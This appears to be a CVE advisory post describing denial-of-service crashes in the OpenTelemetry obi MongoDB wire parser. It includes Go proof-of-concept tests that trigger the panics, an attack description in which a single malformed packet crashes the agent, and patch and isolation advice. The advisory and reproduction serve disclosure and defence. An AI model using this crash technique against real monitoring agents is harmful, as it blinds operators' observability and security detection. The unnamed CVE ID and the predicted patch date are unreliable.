OpenTelemetry obi, Denial of Service via Malformed MongoDB Messages, CVE() (Critical)

Listen to this Post

How the mentioned CVE works:

The vulnerability resides in go.opentelemetry.io/obi versions v0.1.0 through v0.8.0. The MongoDB TCP parser processes raw wire messages without sufficient bounds checking. In parseOpMessage (v0.1.0–v0.3.0), the code reads OP_MSG flags from buf[msgHeaderSize:msgHeaderSize+int32Size] but fails to verify the buffer length. A truncated packet causes a slice-bounds panic. In parseSections (v0.1.0–v0.3.0), after reading the section type byte, it reads a document‑sequence length from buf[offSet:offSet+int32Size] without re‑validating remaining bytes, triggering another slice‑bounds panic. In parseFirstField (v0.1.0–v0.8.0), it assumes the collection name is always a string and performs an unchecked type assertion on field.Value. A malformed BSON document with a non‑string value (e.g., int32) causes an interface conversion panic. All these panics are uncaught, leading to process termination. The parser runs on attacker‑controlled network payloads before full validation, so a single crafted message crashes the telemetry agent, disabling observability until restart. The bounds issues were fixed in v0.4.0 (commit 3aa58cdaaa97fbb72f8ef4c3609ae425aacaf8bb), but the type assertion panic remains in v0.8.0. Affected code paths: pkg/ebpf/common/mongo_detect_transform.go.

dailycve form:

Platform: OpenTelemetry obi
Version: v0.1.0–v0.8.0
Vulnerability: Unchecked parser panics
Severity: Critical
date: 2026-05-18

Prediction: Patch v0.9.0 (2026-06-15)

What Undercode Say:

Analytics:

The following bash commands reproduce the panics in a controlled environment:

Reproduce bounds-check panics (v0.3.0)
git clone https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation.git obi-poc
cd obi-poc
git checkout v0.3.0
cat > pkg/ebpf/common/mongo_security_poc_test.go <<'EOF'
package ebpfcommon
import "testing"
func TestSecurityPoCParseOpMessageShortPanics(t testing.T) {
parseOpMessage(make([]byte, 16), 0, false, nil)
}
func TestSecurityPoCParseSectionsShortDocSequencePanics(t testing.T) {
parseSections([]byte{byte(sectionTypeDocumentSequence), 0x01, 0x02, 0x03})
}
EOF
go test ./pkg/ebpf/common -run 'TestSecurityPoCParseOpMessageShortPanics|TestSecurityPoCParseSectionsShortDocSequencePanics' -count=1
Reproduce BSON type-assertion panic (v0.8.0)
git checkout v0.8.0
cat > pkg/ebpf/common/mongo_security_poc_test.go <<'EOF'
package ebpfcommon
import (
"testing"
"go.mongodb.org/mongo-driver/v2/bson"
)
func TestSecurityPoCParseFirstFieldTypeAssertionPanics(t testing.T) {
parseFirstField(bson.E{Key: "find", Value: int32(123)})
}
EOF
go test ./pkg/ebpf/common -run TestSecurityPoCParseFirstFieldTypeAssertionPanics -count=1

Exploit:

An unauthenticated remote attacker sends a single malformed MongoDB OP_MSG packet with truncated length or a BSON document where a collection name field contains an integer instead of a string. The telemetry agent panics and crashes, stopping all eBPF‑based MongoDB traffic monitoring.

Protection from this CVE:

  • Upgrade to v0.4.0 or later for bounds‑check issues (partial fix). For the type assertion panic, no fixed release exists yet; apply the following workaround: modify `parseFirstField` in `pkg/ebpf/common/mongo_detect_transform.go` to use a type switch instead of direct assertion, e.g., if s, ok := field.Value.(string); ok { ... } else { return err }.
  • Isolate the telemetry agent from untrusted networks or deploy a network firewall to drop malformed MongoDB wire messages before they reach the agent.
  • Restart the agent automatically via a process supervisor (systemd, supervisord) to reduce downtime.

Impact:

Remote unauthenticated denial of service. An attacker can crash the telemetry agent with one crafted packet, causing loss of MongoDB observability, monitoring gaps, and potential blind spots for security detection until manual or automated restart.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top